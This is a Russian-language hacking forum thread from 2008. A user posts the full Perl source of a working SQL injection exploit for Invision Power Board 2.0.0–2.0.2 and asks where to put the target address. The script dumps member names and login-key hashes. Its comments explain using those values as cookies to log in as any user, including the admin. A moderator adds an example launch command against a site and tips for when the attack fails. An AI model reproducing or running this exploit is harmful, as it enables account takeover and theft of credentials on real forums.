ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > Форумы
   
Закрытая тема
 
Опции темы Поиск в этой теме Опции просмотра

  #11  
Старый 30.11.2008, 16:06
max_pain89
Постоянный
Регистрация: 11.12.2004
Сообщений: 592
Провел на форуме:
2260903

Репутация: 345


По умолчанию

объясни слово "выпускать"? Он же не животное, а скрипт. Полностью безопасный для компьютера исполняющего сценарий.
 

  #12  
Старый 30.11.2008, 16:41
or1
Banned
Регистрация: 07.09.2008
Сообщений: 48
Провел на форуме:
127764

Репутация: -1
По умолчанию

Цитата:
Сообщение от max_pain89  
объясни слово "выпускать"? Он же не животное, а скрипт. Полностью безопасный для компьютера исполняющего сценарий.
спасибо!



что в этих строках нужно прописывать.я их выделил красным

объясните кто может тут и другие после будут читать..

еще ,тут нужно за место 127.0.0.1 прописать адрес кого ломать ,или так остаётся все

Код:
#!/usr/bin/perl 
use IO::Socket; 

# # # # 
# # # # 
# # # # 
# ## #### ## # 
## ## ###### ## ## 
## ## ###### ## ## 
## ## #### ## ## 
### ############ ### 
######################## 
############## 
######## ########## ####### 
### ## ########## ## ### 
### ## ########## ## ### 
### # ########## # ### 
### ## ######## ## ### 
## # ###### # ## 
## # #### # ## 
## ## 

## Invision Power Board v2.0.0 - 2.0.2 sql injection exploit 
## by RusH security team (www.rst.void.ru) 
## coded by 1dt.w0lf 
## ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ 
## example: 
## 
## r57ipb.pl 127.0.0.1 /IPB202/ 2 1 38e2a2752535f5b9a2636b1e22e7bee6 
## ------------------------------------------------------------------------------------------------ 
## [>] SERVER: 127.0.0.1 
## [>] DIR: /IPB202/ 
## [>] FORUM: 2 
## [>] TOPIC: 1 
## [>] SID: 38e2a2752535f5b9a2636b1e22e7bee6 
## [>] PREFIX: 
## [>] ID:15956 
## ------------------------------------------------------------------------------------------------ 
## 
## [~] PREPARE TO CONNECT... 
## [+] CONNECTED 
## [~] SENDING QUERY... 
## [+] DONE! 
## 
## PREFIX: ibf_ 
## 
## r57ipb.pl 127.0.0.1 /IPB202/ 2 1 38e2a2752535f5b9a2636b1e22e7bee6 ibf_ 
## ------------------------------------------------------------------------------------------------ 
## [>] SERVER:127.0.0.1 
## [>] DIR: /IPB202/ 
## [>] FORUM: 2 
## [>] TOPIC: 1 
## [>] SID: 38e2a2752535f5b9a2636b1e22e7bee6 
## [>] PREFIX: ibf_ 
## [>] ID:15956 
## ------------------------------------------------------------------------------------------------ 
## 
## [~] PREPARE TO CONNECT... 
## [+] CONNECTED 
## [~] SENDING QUERY... 
## [+] DONE! 
## 
## --[ REPORT ]------------------------------------------------------------------------------------ 
## MEMBER_ID: [1] NAME: [admin] PASS_HASH: [73dea61281aa9b08ed31b4ae2bb9954e] 
## ------------------------------------------------------------------------------------------------ 
## Now you need edit cookie and insert new pass_hash and member_id values. 
## ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ 
## Пару слов о возвращаемом эксплоитом результате: 
## Значение pass_hash это не зашифрованный пароль юзера!!! а одноименное значение из кукиса с 
## помощью которого можно войти на форум под любым юзером без ввода пароля. 
## member_id это также одноименное значение из кукиса. 
## Поэтому не стоит пытаться расшифровать pass_hash =) Просто зарегистрируйтесь на форуме и измените 
## pass_hash и member_id в вашем cookie на одно из значений которые выдаст сплоит. 
## ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ 


if (@ARGV < 5) 
{ 
print "-------------------------------------------------------------------------\r\n"; 
print " Invision Power Board v2.0.0 - 2.0.2 sql injection exploit\r\n"; 
print "-------------------------------------------------------------------------\r\n"; 
print "usage:\r\n"; 
print "r57ipb.pl SERVER /DIR/ FORUM_NUM TOPIC_NUM SID [TABLE_PREFIX] [USER_ID]\r\n\r\n"; 
print "SERVER - server where IPB installed\r\n"; 
print "/DIR/ - IPB directory or / for no directory\r\n"; 
print "FORUM_NUM - number of existing forum\r\n"; 
print "TOPIC_NUM - number of existing topic\r\n"; 
print "SID - your session id\r\n"; 
print "[TABLE_PREFIX] - table prefix in database\r\n"; 
print "[USER_ID] - user id for exploiting\r\n\r\n"; 
print "e.g. r57ipb.pl 127.0.0.1 /IPB/ 2 1 38e2a2752535f5b9a2636b1e22e7bee6 ibf_\r\n"; 
print "-------------------------------------------------------------------------\r\n"; 
exit(); 
} 

if (@ARGV < 6) { $get_table = 1; } 

$server = $ARGV[0]; 
$dir = $ARGV[1]; 
$fnum = $ARGV[2]; 
$tnum = $ARGV[3]; 
$sid = $ARGV[4]; 
$prefix = $ARGV[5]; 
$id = $ARGV[6]; 

print "------------------------------------------------------------------------------------------------\r\n"; 
print "[>] SERVER: $server\r\n"; 
print "[>] DIR: $dir\r\n"; 
print "[>] FORUM: $fnum\r\n"; 
print "[>] TOPIC: $tnum\r\n"; 
print "[>] SID: $sid\r\n"; 
print "[>] PREFIX: $prefix\r\n"; 
print "[>] ID: $id\r\n"; 
print "------------------------------------------------------------------------------------------------\r\n\r\n"; 

$server =~ s/(http:\/\/)//eg; 

$path = $dir; 
$path .= "index.php?s="; 
$path .= $sid; 
$path .= "&act=Post&CODE=02&f="; 
$path .= $fnum; 
$path .= "&t="; 
$path .= $tnum; 
if ($get_table == 1) 
{ 
$path .= "&qpid=r57" 
} 
else 
{ 
$path .= "&qpid=666666666)%20union%20select%201,1,1,1,1,1,1,1,1,1,CONCAT(id,char(58),name,char(58),member_login_key),1,1,1,1,1,1,1,1,1%20from%20"; 
$path .= $prefix; 
$path .= "members"; 
$path .= ($id)?("%20WHERE%20id=$id%20"):("%20"); 
$path .= "/*"; 
} 
print "[~] PREPARE TO CONNECT...\r\n"; 

$socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$server", PeerPort => "80") || die "[-] CONNECTION FAILED"; 

print "[+] CONNECTED\r\n"; 
print "[~] SENDING QUERY...\r\n"; 
print $socket "GET $path HTTP/1.1\r\n"; 
print $socket "Host: $server\r\n"; 
print $socket "Accept: */*\r\n"; 
print $socket "Connection: close\r\n\r\n"; 
print "[+] DONE!\r\n\r\n"; 

$suc =0; 

if ($get_table == 1) 
{ 
while ($answer = <$socket>) 
{ 
if ($answer =~ /(mySQL query error: )(.*)( FROM )(.*)(posts)/){ print "PREFIX: $4\r\n"; $suc = 1; } 
} 
if (!$suc) { print "Exploit failed\r\n"; } 
exit(); 
} 

print "--[ REPORT ]------------------------------------------------------------------------------------\r\n"; 
while ($answer = <$socket>) 
{ 
if ($answer =~ /^([^:]*):([^:]*):([a-z,0-9]{32})$/) { print "MEMBER_ID: [$1] NAME: [$2] PASS_HASH: [$3]\r\n"; $suc = 1; } 
} 
print "------------------------------------------------------------------------------------------------\r\n"; 
if ($suc == 1) { print "Now you need edit cookie and insert new pass_hash and member_id values.\r\n"; exit(); } 
else { print "Exploit failed\r\n";

Последний раз редактировалось ZAMUT; 01.12.2008 в 00:46..
 

  #13  
Старый 01.12.2008, 00:45
ZAMUT
Members of Antichat - Level 5
Регистрация: 24.10.2007
Сообщений: 256
Провел на форуме:
6905523

Репутация: 1174
По умолчанию

1 - Тема не для вопросов, существует отдельная.
2 - Топик "немного" устарел, не находите ?
3 -
Код:
if (@ARGV < 6) { $get_table = 1; } 

$server = $ARGV[0]; 
$dir = $ARGV[1]; 
$fnum = $ARGV[2]; 
$tnum = $ARGV[3]; 
$sid = $ARGV[4]; 
$prefix = $ARGV[5]; 
$id = $ARGV[6]; 

print "------------------------------------------------------------------------------------------------\r\n"; 
print "[>] SERVER: $server\r\n"; 
print "[>] DIR: $dir\r\n"; 
print "[>] FORUM: $fnum\r\n"; 
print "[>] TOPIC: $tnum\r\n"; 
print "[>] SID: $sid\r\n"; 
print "[>] PREFIX: $prefix\r\n"; 
print "[>] ID: $id\r\n"; 
print "------------------------------------------------------------------------------------------------\r\n\r\n";
запуск предполагает:
Код:
xek.pl site.com / 1 1 38e2a2752535f5b9a2636b1e22e7bee6 ibf_ 1
Если сделал все как того оно предполагает, и результата не принесло - пропатчено, или перфикс не дефолтный
4 - Закрыто.

Последний раз редактировалось ZAMUT; 01.12.2008 в 00:48..
 
Закрытая тема



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
угон паролей в ipb AoD Авторские статьи 11 30.06.2006 21:49
Взлом пароля Kudesnik Болталка 13 22.03.2005 18:36
Взлом пароля от Windows XP falcon_xxx АнтиАдмин 9 10.02.2005 19:19



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ